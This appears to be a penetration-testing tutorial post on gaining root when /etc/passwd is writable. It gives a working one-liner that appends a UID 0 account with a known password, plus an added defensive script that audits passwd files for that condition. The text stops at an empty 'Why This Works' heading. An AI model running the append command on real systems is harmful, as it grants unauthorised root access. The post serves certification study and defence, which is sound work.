OSCP Quick Hacktricks | Linux: writeable /etc/passwd

Privilege Escalating when /etc/passwd Is Writeable

Security Guy
Jul 4, 2024

The Trick

On rare occasions, you will find /etc/passwd to be writeable on the target Linux machine. Escalating in this case is simple if you know what you are doing. Enumeration tools such as LinPEAS will also highlight it, as this should be a surefire way to gain root privileges.

All you need to do is run:

pw=$(openssl passwd Password123); echo "r00t:${pw}:0:0:root:/root:/bin/bash" >> /etc/passwd

Run this on the target machine. The two commands set a variable pw to the openssl passwd hash of the chosen password (in this example Password123, but you can choose whatever you like) and then append a new line to /etc/passwd of the form

r00t:<hash of Password123>:0:0:root:/root:/bin/bash

As with the password, you can choose whatever username you want; this example uses r00t. You can then run:

su r00t

Now you input Password123 as the password, and you have a root shell!
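A defender-side check for the condition described above, as an added example that is not part of the original post: it flags a passwd file that is writable by group or other, any UID 0 account besides root, and any entry carrying a hash in the password field. The function name audit_passwd, the finding labels and the sample file are assumptions made for illustration, and it assumes a Linux stat that supports -c.

```shell
#!/bin/sh
# Added defensive example, not from the original post.
# audit_passwd FILE prints one finding per line for a passwd-format file.
audit_passwd() {
    file=$1
    perms=$(stat -c '%a' "$file") || return 2   # octal mode, e.g. 644
    other=${perms#"${perms%?}"}                  # last digit: "other" bits
    rest=${perms%?}
    group=${rest#"${rest%?}"}                    # second-to-last: "group" bits
    for bits in "$group" "$other"; do
        case $bits in
            2|3|6|7) echo "WRITABLE_BY_NON_OWNER mode=$perms"; break ;;
        esac
    done
    awk -F: '
        /^#/ || NF == 0 { next }
        # Any UID 0 account other than root is a second superuser.
        $3 ~ /^0+$/ && $1 != "root" { print "EXTRA_UID0 " $1 }
        # With shadow passwords, field 2 is "x" (or a lock marker);
        # a hash here is what the append shown above leaves behind.
        $2 == "" { print "EMPTY_PASSWORD " $1; next }
        $2 !~ /^(x|\*|!+)$/ { print "INLINE_HASH " $1 }
    ' "$file"
}

# Constructed sample: passwd contents after such an append.
# The hash value is a placeholder, not real openssl output.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
r00t:PLACEHOLDERHASH:0:0:root:/root:/bin/bash
EOF
}

tmp=$(mktemp)
sample_passwd > "$tmp"
chmod 666 "$tmp"          # simulate the misconfiguration
audit_passwd "$tmp"
rm -f "$tmp"
```

On a real host, run audit_passwd /etc/passwd; a correctly configured system (mode 644, root as the only UID 0 account, "x" in every password field) produces no output.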

Why This Works
